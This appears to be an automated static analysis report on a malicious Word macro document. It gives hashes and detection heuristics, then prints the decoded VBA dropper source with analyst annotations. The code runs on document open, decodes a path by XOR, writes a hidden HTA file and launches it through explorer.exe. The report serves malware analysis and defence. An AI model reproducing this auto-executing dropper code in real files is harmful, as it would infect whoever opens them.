Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 f3cf2ebf56a81a8a…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 78.8 KB
Created: 2021-02-04 08:59:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-02-23
MD5: 5790ec844d2e668984fb07cf24b917ed
SHA-1: 0a7e74ae58f383f6b96e0080043d5cf4820cebc9
SHA-256: f3cf2ebf56a81a8afd2d86fabbf4087a544d349b7f4a4dd37ae304ff47920c88
Risk score: 192

Heuristics (7)

  • ClamAV: Doc.Downloader.8f0f0f0fe0f0f0f0-OOXML-9981534-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.8f0f0f0fe0f0f0f0-OOXML-9981534-0
  • VBA project inside OOXML (medium, OOXML_VBA; 3 related findings)
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA (critical, OLE_VBA_SHELL)
    Matched line in script:
    Shell "C:\Windows\explorer.exe " & a9irm
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
    Matched line in script:
    Set aN6sm = CreateObject("Scripting.FileSystemObject")
  • AutoOpen macro (low, OLE_VBA_AUTOOPEN)
    Matched line in script:
    Sub AutoOpen()
  • Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; each URL's label records which channel (macro, JS, link annotation, document body, ...) reached it.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 4319 bytes
SHA-256: 795954f090533ca8264b27269daf69fa022abc0a85b7afcefe4e3828bce8b936
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 1 long base64-like blob(s))
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "myf"
Attribute VB_Base = "0{16763085-3C93-463D-99D8-B145700BF18A}{59C4E7BB-A9FB-4DB2-91DD-B3F2B23E1220}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "ab5EJy"
Function aX4Z7(aqtJF)
' [analyst note] Splits the encoded constant on the delimiter "1234" into numeric tokens.
' The anrimp guard is always true: anrimp is never assigned, so Empty <> 16 holds.
aCQRBn = "1234"
' Marl broad networks
' Authorized serum begin
' Cede cardiff
' Prescription anal nascent
' Colourless lire record
' Exemplify indus tuning
If anrimp <> 16 Then
aX4Z7 = VBA.Split(aqtJF, aCQRBn)
End If
End Function
Sub AutoOpen()
' [analyst note] Entry point: runs apm7I (below) as soon as the document is opened.
' Bi
' Jumps failures parliament snore
apm7I
End Sub

Attribute VB_Name = "axNK7"
Function aMy3ZT()
' [analyst note] Reads the payload text stored in the text1 control of the "myf" UserForm declared above.
' Broadband cobra
' Archives retirement almighty hoary walloon
' Additionally authorities
' Dualism generic mass
' Occupant processor
' Appropriations tureen liz portraits
aMy3ZT = myf.text1.value
End Function
Function a7dwK(aioslg)
' [analyst note] Reverses its argument character by character (the form text is stored backwards).
Dim ahRYZ As String
Dim ach8Cs As String
Dim aT82Rg As Long
Dim al9Ogj As Integer
aT82Rg = Len(aioslg)
ahRYZ = ""
For al9Ogj = aT82Rg To 1 Step -1
ach8Cs = Mid(aioslg, al9Ogj, 1)
ahRYZ = ahRYZ & ach8Cs
Next al9Ogj
a7dwK = ahRYZ
End Function
Function aCYFm2(arcMGL)
' [analyst note] Converts a numeric code to its character; the <> 16 guard only skips the XOR key itself.
' Bermuda
If arcMGL <> 16 Then
aCYFm2 = Chr("" & arcMGL & "")
End If
End Function
Sub ajCHn(asm2e, aaUGt)
' [analyst note] Drops a file: writes aaUGt to the path asm2e through Scripting.FileSystemObject.
' Brawny betty minolta
' Script opprobrium
' Usr henry store purchasing
Set aN6sm = CreateObject("Scripting.FileSystemObject")
' Antonio hotels stoic
' Sexton
' Omniscient corolla papal hera sheets pissing
' Withers vans alexandra shorts
Set aAC7R = aN6sm.CreateTextFile(asm2e)
aAC7R.WriteLine aaUGt
aAC7R.Close
' Couplet loading darrell
' Card staffs
' Montreal determines minolta sparse
' Delivers assuming critics pickaxe adventuress powell
' Seventy-four
' Impressive boots dormant
' Wrongdoing students inclusive varuna
' Bufing removed nba myself digestive
' Waxing medicinal prostores pelf
' Dais delete
' Differentiation adventitious voluptuous dollar
' Sie handling redolent
' Cult police discontinued nor sky alternatively animal
' Crew
' Exodus over- irrigation adobe
End Sub

Attribute VB_Name = "aLl92v"
Public Const aD9Sx As String = "1171234104123496123412412341271234981234117123498"
Public Const ayCma As String = "11512344212347612349612349812341271234119123498123411312341251234116123411312341001234113123476123411312348112341181234911234691234123123462123412012341001234113"
Function a8XwtN(aarbZ5, aihuL)
' [analyst note] XORs one numeric token with the key aihuL (16); VBA's precedence makes this ("" & aarbZ5) Xor aihuL.
' The Len <> 4 guard is always true for the 2- and 3-digit tokens produced by aX4Z7.
' Carbolic robust bitch
' Happen harpoon edit queue
' Protecting clinic
' Cuckold cinderella divulge
' Deranged lands
If Len(aarbZ5) <> 4 Then
a8XwtN = Trim("" & aarbZ5 Xor aihuL)
End If
End Function
Function alchms(ap2Oc As Variant)
' [analyst note] Decoder: XOR each token with 16, convert to a character, and concatenate.
Dim a7aok As String
a7aok = ""
For aL1nq0 = 0 To UBound(ap2Oc)
aU40MK = aCYFm2(a8XwtN(ap2Oc(aL1nq0), 16))
a7aok = a7aok & aU40MK
Next aL1nq0
alchms = a7aok
End Function
Sub apm7I()
' [analyst note] Main routine. a9irm is the drop path decoded from ayCma (split on "1234", XOR 16, Chr);
' applying that routine to the constant above yields c:\programdata\aAfKUk.hta. The reversed UserForm
' text is written there and the file is opened through explorer.exe, which hands it to the .hta handler.
' Championships
' Fickleness
' Initially adapter
' Bikini reproduce
' Incongruous consequence observant caper fornication
' Dresses accent defensible fie evaporate spice
' Churches hat temperature vibrate cuckold
avL3oi = aMy3ZT()
' Humans chapman
' Referenced
' Adores plants instructional sell
' Intend substitution backbone porous knows
' Doggedly drug forage prodigy
' Jaunt present-day formal exponent
' Hs had mammals respectively sand beck flip
a9irm = alchms(aX4Z7(ayCma))
' Interstate
' Respiratory
Call ajCHn(a9irm, a7dwK(avL3oi))
' Dike bacchus heinous max
' Regenerate dancer partner arg
' Ashen vociferous insomnia
' Skepticism muslim mutual oils
' Dazzle athletes pico
' Impacts concentrations short-lived practical subversion
Shell "C:\Windows\explorer.exe " & a9irm
' Pharmacies amaryllis municipal
' Indigent newport
' Crags
' Cog decide killing jesse rock
' Ruby uh
' Wait stomach perth
' Larch training coop internship
' Quantum prune taiwan
' Expenses retaliation
' Immobile heterodox xhtml
End Sub

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 31744 bytes
SHA-256: a1a87adff8ae7dfefde089b4856850cd34f8f9e70286292193935e0f9daf05f5
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 3 long base64-like blob(s))